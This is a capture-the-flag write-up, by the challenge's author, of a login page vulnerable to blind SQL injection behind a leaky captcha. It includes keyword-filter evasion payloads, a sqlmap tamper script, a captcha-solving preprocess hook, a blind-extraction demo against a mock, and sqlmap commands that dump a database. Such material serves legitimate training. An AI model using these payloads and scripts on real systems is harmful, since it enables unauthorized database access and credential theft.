Exploit SQL Injection and bypass captcha with SQLMAP
Kenzy challenge (Cyber wargames 2022)
SQL Injection + Captcha bypass
Challenge description:
This login page is protected by a captcha to deny any brute-force attack.
1. The captcha is not fully secure
2. Login page functionality is vulnerable to Blind SQL Injection
Attack vector
Bypass the captcha and get the flag from the database.
Steps to solve this challenge
1. First part => Detect SQL Injection
If you enter an invalid username or password, the page shows this response message
{"Username":"admin","status":"Invalid username or password"}
If you add a single quote ' it shows [statement error], so the quote reaches the SQL statement unescaped and breaks its syntax
{"Username":"admin'","status":"statement error"}
Sending two single quotes '' gives a syntactically valid statement again (the second quote escapes the first) and the page returns
{"Username":"admin","status":"Invalid username or password"}
That is good: the input is clearly interpolated into the query, and the two distinct responses (statement error versus invalid login) are exactly what blind SQL injection needs.
After I passed this payload
admin'or sleep(5) --
the Username field echoed in the response came back as
admin'sleep(5)--
The echo reveals the filter: the application removes [or, and, spaces] from the input before it reaches the query.
I bypassed these filters as follows (the filter strips each keyword only once, so a doubled keyword survives with one copy):
1. spaces => MySQL comment /**/
2. or => oorr
3. and => anandd
I sent this payload
admin'oorr/**/sleep(5)#
The response was delayed by 10 seconds (double the 5 seconds requested) and redirected to the admin panel => http://34.175.249.72:60001/kenzy_admin-panel.php
Treasures are always in the database
This means I should fully exploit the injection and dump the database to get these treasures :D
I want to run sqlmap, but it would be stopped by the captcha that every login request must carry.
2. Second part => Captcha bypass
Inspect element to view the source code; there I found the path of the captcha script.
Go to the captcha path [http://34.175.249.72:60001/scripts/captcha.php] and view the response in Burp Suite: you will find the captcha value disclosed in the response, but double-encoded in base64.
Note:
You have 2 solutions
1. Write a script that reads the disclosed captcha value from captcha.php
2. Write an OCR Python script that reads the captcha code from the image
Scripting part
I chose to solve the challenge with sqlmap, using a tamper script to bypass the keyword filters and a preprocess script to solve the captcha before every request.
Tamper script to bypass filters
from lib.core.enums import PRIORITY
import re

__priority__ = PRIORITY.LOWEST


def dependencies():
    pass


def tamper(payload, **kwargs):
    # The server strips "or" and "and" once, so doubling each keyword
    # ("oorr", "anandd") leaves exactly one copy after the filter.
    # Spaces are handled by chaining the built-in space2comment tamper.
    retVal = payload
    if payload:
        retVal = re.sub(r"(?i)(or)", "oorr", retVal)
        retVal = re.sub(r"(?i)(and)", "anandd", retVal)
    return retVal
Preprocess script to bypass the captcha
import base64
import re
import urllib.parse

import requests

CAPTCHA_URL = "http://34.175.249.72:60001/scripts/captcha.php"
# Must be the same PHPSESSID as in req-sqli.txt: the captcha is bound to the
# session, so a value fetched for another session is rejected by the login.
COOKIES = {"PHPSESSID": "dvtd7c1gss3oldmp4obam7hu6p"}


def solve_captcha():
    try:
        response = requests.get(CAPTCHA_URL, cookies=COOKIES, verify=False)
    except Exception as e:
        print(e)
        raise
    # captcha.php discloses the current captcha on a line starting with "CAPTCHA";
    # slice off the label and the trailing quote to keep only the encoded value.
    fetch_captcha = re.findall(r"CAPTCHA.*", response.text)[0][10:-1]
    return fetch_captcha


def preprocess(req):
    # sqlmap calls this before every request it sends: fetch a fresh captcha,
    # decode it twice (it is double base64-encoded) and append it to the POST body.
    captcha = solve_captcha()
    captcha = base64.b64decode(base64.b64decode(captcha).decode("utf-8")).decode("utf-8")
    if req.data:
        req.data += b"&captcha=" + urllib.parse.quote(captcha).encode("utf-8")
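What sqlmap automates with the two hooks above, modelled offline as an added example (this is not code from the challenge, from the author, or from sqlmap). It covers both the filter-bypass step from the first part and the captcha step from the second: a constructed mock of the login page applies the observed blacklist (one pass removing or, and, spaces), checks the captcha, and answers "Invalid username or password" when the injected condition is false; a boolean-based blind extractor then recovers a value one character at a time by binary search over its ASCII code, fetching and double-decoding a fresh captcha before every request. The mock, the `CAPTCHA = "<double base64>"` layout of captcha.php, the `flag` column name and the flag value are constructed assumptions; the filter behaviour and the double base64 encoding follow the observations in this writeup.

```python
import base64
import re

# Constructed secret for the offline mock; on the real target it lives in kenzy.solve.flag
FLAG = "flag{d0ubl3_b64_c4ptch4}"


def strip_filter(value):
    """Blacklist observed on the login page: one pass removing 'or', 'and' and spaces."""
    for word in ("or", "and", " "):
        value = value.replace(word, "")
    return value


def bypass(payload):
    """Same idea as the tamper script chained with space2comment:
    doubled keywords survive the single-pass filter, /**/ stands in for spaces."""
    payload = re.sub(r"(?i)or", "oorr", payload)
    payload = re.sub(r"(?i)and", "anandd", payload)
    return payload.replace(" ", "/**/")


def decode_captcha(page_source):
    """Pull the leaked captcha out of captcha.php's source and undo the double base64.
    The CAPTCHA = "..." layout is an assumption of this mock, not the real page's format."""
    encoded = re.search(r'CAPTCHA\s*=\s*"([^"]+)"', page_source).group(1)
    return base64.b64decode(base64.b64decode(encoded)).decode()


class MockLogin:
    """Constructed stand-in for the challenge's login page and its captcha.php."""

    def __init__(self, flag=FLAG):
        self.flag = flag
        self.captcha = "k3nzy"  # session-bound captcha value (constructed)

    def captcha_php(self):
        inner = base64.b64encode(self.captcha.encode())
        leaked = base64.b64encode(inner).decode()
        return f'<!-- CAPTCHA = "{leaked}" -->'

    def login(self, username, captcha):
        filtered = strip_filter(username)
        if captcha != self.captcha:
            return {"Username": filtered, "status": "wrong captcha"}
        sql = filtered.replace("/**/", "")  # MySQL treats /**/ as whitespace
        m = re.fullmatch(r"admin'or\(ascii\(substr\(flag,(\d+),1\)\)>(\d+)\)#", sql)
        if m is None:
            return {"Username": filtered, "status": "statement error"}
        pos, threshold = int(m.group(1)), int(m.group(2))
        char = self.flag[pos - 1:pos]
        # ascii('') is 0 in MySQL, so positions past the end always compare false
        condition = (ord(char) if char else 0) > threshold
        status = "redirect: kenzy_admin-panel.php" if condition else "Invalid username or password"
        return {"Username": filtered, "status": status}


def extract_flag(target, max_len=64):
    """Boolean-based blind extraction (sqlmap --technique=B): binary search over the
    ASCII code of each character, with a fresh captcha fetched before every request,
    and 'Invalid username or password' playing the role of the false-condition marker."""
    out = ""
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            payload = f"admin' or (ascii(substr(flag,{pos},1))>{mid})#"
            captcha = decode_captcha(target.captcha_php())
            reply = target.login(bypass(payload), captcha)
            if reply["status"] == "Invalid username or password":
                hi = mid        # condition false: character code <= mid
            else:
                lo = mid + 1    # condition true: character code > mid
        if lo == 0:
            break  # ran past the end of the value
        out += chr(lo)
    return out


if __name__ == "__main__":
    print(extract_flag(MockLogin()))
```

Seven requests per character is what the binary search costs; sqlmap's boolean-based technique does the same thing, which is why every one of those requests needs its own valid captcha and why the preprocess hook, not a one-off cookie, is the right place to solve it.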
SQLMap command
python3 /usr/bin/sqlmap -r req-sqli.txt --banner --prefix="'" --suffix=";#" --batch --tamper=space2comment,tamper-bypass-and-or.py -p username --preprocess solve-captcha-preprocess.py --technique=B --not-string="statement error" --level=2
Explain the command
--banner : Retrieve DBMS banner
--prefix : Injection payload prefix string (here the quote that closes the original string literal)
--suffix : Injection payload suffix string (here ;# to terminate the statement and comment out the rest)
--batch : Never ask for user input, use the default behavior
--tamper : Use given script(s) for tampering injection data
--preprocess: Use given script(s) for preprocessing (request)
--technique: SQL injection techniques to use
--not-string: String to match when query is evaluated to False
--level: Level of tests to perform (1-5)
-p : Testable parameter
tamper VS preprocess
tamper script: manipulates the injection payload itself, i.e. the SQL sqlmap generates for the tested parameter
preprocess script: manipulates the rest of the request (other parameters, headers, cookies) and runs before every request sqlmap sends, independently of the payload
Running these scripts within sqlmap to automate solving the captcha and dump the database (the proxy option sends every request through Burp so the captcha handling can be watched):
python3 /usr/bin/sqlmap -r req-sqli.txt --dbms=MySQL -D kenzy -T solve -C flag --dump --prefix="'" --suffix=";#" --batch --tamper=space2comment,tamper-bypass-and-or.py --proxy="http://127.0.0.1:8080" -p username --preprocess solve-captcha-preprocess.py --flush-session --technique=B --not-string="statement error" --level=2
Thank you, this was an SQL injection challenge I developed for the Arab Security Cyber Wargames CTF.